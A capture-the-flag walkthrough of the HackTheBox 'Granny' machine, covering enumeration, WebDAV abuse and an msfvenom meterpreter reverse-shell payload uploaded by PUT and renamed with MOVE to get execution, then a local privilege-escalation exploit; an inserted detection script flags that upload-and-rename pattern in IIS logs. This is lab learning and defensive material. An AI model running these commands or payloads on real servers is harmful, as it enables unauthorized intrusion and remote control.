HackTheBox - Granny


Last updated 4 years ago


Nmap scan results (Basic and all port)

Let's edit the /etc/hosts file and add granny.htb to it.

So the IIS web server is very old (2003). You can search for it on Google.

Gobuster scan results

gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://granny.htb/ -t 20 -o gobuster-dir-scan.out

Nmap also scanned the webpage with the http-webdav-scan script. We can use a tool named davtest.

DAVTest tests WebDAV enabled servers by uploading test executable files, and then (optionally) uploading files which allow for command execution or other actions directly on the target. It is meant for penetration testers to quickly and easily determine if enabled DAV services are exploitable.

Performing Davtest scan

The nikto scan says that clients can UPLOAD or DELETE files on the web server.

Let's try to upload a simple HTML file.

curl -X PUT http://10.10.10.15/hello.html -d 'This is the file that I uploaded'

Generating reverse shell using msfvenom

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.3 LPORT=4444 -f aspx -o shell.aspx

We can't upload a .aspx file, but we can upload a .html file.

curl -X PUT http://10.10.10.15/shell.html -d @shell.aspx

The MOVE request renames shell.html to shell.aspx. With that done, we can finally execute the file and probably get a shell.
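The upload-then-rename sequence above, seen from the server side: an added detection example (not part of the original writeup) that flags a client which PUTs a file, MOVEs that same path, and then requests a script extension with the same base name. It assumes a W3C extended log with the fields shown; the log lines, file names and IP addresses are constructed, and because the MOVE target travels in the WebDAV Destination header, which this log layout does not record, the detector correlates on the source path.

```python
import os
from datetime import datetime, timedelta

SCRIPT_EXTS = {".asp", ".aspx", ".asa", ".ashx", ".cer"}  # assumed server-executed extensions
WINDOW = timedelta(minutes=10)  # assumed max gap between the PUT and the MOVE

# Constructed sample in W3C extended format; IPs are documentation addresses.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem sc-status
2024-01-05 10:00:01 198.51.100.7 GET /index.html 200
2024-01-05 10:02:10 203.0.113.9 PUT /notes.html 201
2024-01-05 10:02:15 203.0.113.9 MOVE /notes.html 201
2024-01-05 10:02:20 203.0.113.9 GET /notes.aspx 200
2024-01-05 10:05:00 198.51.100.7 PUT /report.html 201
2024-01-05 10:06:00 198.51.100.7 GET /report.html 200
2024-01-05 11:30:00 198.51.100.8 MOVE /old.html 207
"""

def parse(log_text):
    """Yield one dict per request, using the #Fields directive for column names."""
    fields = []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            row = dict(zip(fields, line.split()))
            row["ts"] = datetime.strptime(row["date"] + " " + row["time"], "%Y-%m-%d %H:%M:%S")
            yield row

def find_upload_then_rename(log_text):
    """Return alerts for PUT -> MOVE on one path by one client, plus later script hits."""
    uploads, alerts = {}, {}
    for r in parse(log_text):
        key = (r["c-ip"], r["cs-uri-stem"].lower())
        ok = r["sc-status"].startswith("2")
        base, ext = os.path.splitext(key[1])
        if r["cs-method"] == "PUT" and ok:
            uploads[key] = r["ts"]  # remember the successful upload
        elif r["cs-method"] == "MOVE" and ok and key in uploads and r["ts"] - uploads[key] <= WINDOW:
            alerts[(r["c-ip"], base)] = {"client": r["c-ip"], "uploaded": key[1],
                                         "moved_at": r["ts"], "script_hits": []}
        elif ext in SCRIPT_EXTS and (r["c-ip"], base) in alerts:
            alerts[(r["c-ip"], base)]["script_hits"].append(key[1])
    return list(alerts.values())

if __name__ == "__main__":
    for alert in find_upload_then_rename(SAMPLE_LOG):
        print(alert)
```

A lone PUT or a MOVE of a file the client did not upload is not flagged, which keeps ordinary WebDAV publishing out of the alert stream.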

Running Exploit Suggester from msfconsole

Background the session using the background command and search for the exploit suggester.

This module will search for local exploits and we can use that to escalate our privileges.

Using the exploit/windows/local/ms15_051_client_copy_image exploit

We can use the HTTP MOVE method to upload a .aspx file. Read more about it here.